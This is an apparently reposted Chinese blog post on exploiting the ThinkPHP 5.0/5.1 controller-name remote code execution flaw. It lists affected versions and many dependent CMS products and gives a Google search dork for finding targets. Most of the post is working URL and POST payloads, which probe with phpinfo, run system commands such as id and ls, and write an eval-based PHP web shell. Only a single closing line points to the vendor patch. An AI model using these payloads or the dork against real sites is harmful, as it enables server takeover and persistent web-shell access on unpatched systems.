• Thinkphp5命令执行利用


    漏洞概述

      ThinkPHP是一个免费开源的,快速简单的面向对象的轻量级PHP开发框架。该框架常被用来进行二次开发,国内应用非常广泛。

      该漏洞出现的原因在于ThinkPHP5框架底层对控制器名过滤不严,从而让攻击者可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞

    intext:十年磨一剑 - 为API开发设计的高性能框架

    影响版本:

    • ThinkPHP 5.0.5-5.0.22
    • ThinkPHP 5.1.0-5.1.30

    影响范围:

    • AdminLTE后台管理系统
    • layui后台管理系统
    • thinkcmf
    • H-ui.admin后台管理系统
    • tpshop
    • FsatAdmin
    • eyoucms
    • LarryCMS后台管理系统
    • tpadmin后台管理系统
    • snake后台管理系统
    • ThinkSNS
    • DolphinPHP后台管理系统
    • WeMall商城系统
    • CLTPHP
    • 齐博CMS
    • DSMALL
    • YFCMF
    • HisiPHP后台管理系统
    • Tplay后台管理系统
    • lyadmin后台管理系统
    • haoid后台管理系统

    Google语法:

    intext:十年磨一剑 - 为API开发设计的高性能框架

    搜索得到:

    通过phpinfo函数写出phpinfo()的信息,测试是否存在thinphp5的漏洞

    /index.php?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1  #普遍适用的playload 
    index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
    /index.php?s=index/	hinkRequest/input&filter=phpinfo&data=1&vars[1][]=whoami 
    /?s=admin/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

    进行远程命令执行:

    /index.php?s=index/	hinkRequest/input&filter=phpinfo&data=1&vars[1][]=whoami
    /index.php?s=captcha
    post:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls 
    index.php?s=captcha 或者 index.php
    post:c=system&f=ls&_method=filter
    s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id 
    s=index/	hinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

    写入一句话或者大马:

    /index.php/?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=readme.txt&vars%5B1%5D%5B%5D=1  
    /?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=1.php&vars[1][]=<?php phpinfo();?>
    index.php?s=/index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php
    

     

    漏洞防御:

    目前,ThinkPHP官方已经发布更新修复了该漏洞,建议用户及时确认是否受到漏洞影响,尽快采取修补措施。官方链接如下:

    http://www.thinkphp.cn/down.html 

  • 相关阅读:
    [每日一题] OCP1z0-047 :2013-07-29 视图――别名
    Java动态规划实现最短路径问题
    Java动态规划实现最短路径问题
    Java实现堆排序问题(变治法)
    Java实现堆排序问题(变治法)
    Java实现堆排序问题(变治法)
    Java实现堆排序问题(变治法)
    Java实现堆排序问题(变治法)
    Java实现8枚硬币问题(减治法)
    Java实现8枚硬币问题(减治法)
  • 原文地址:https://www.cnblogs.com/someone9/p/10435751.html
Copyright © 2020-2023  润新知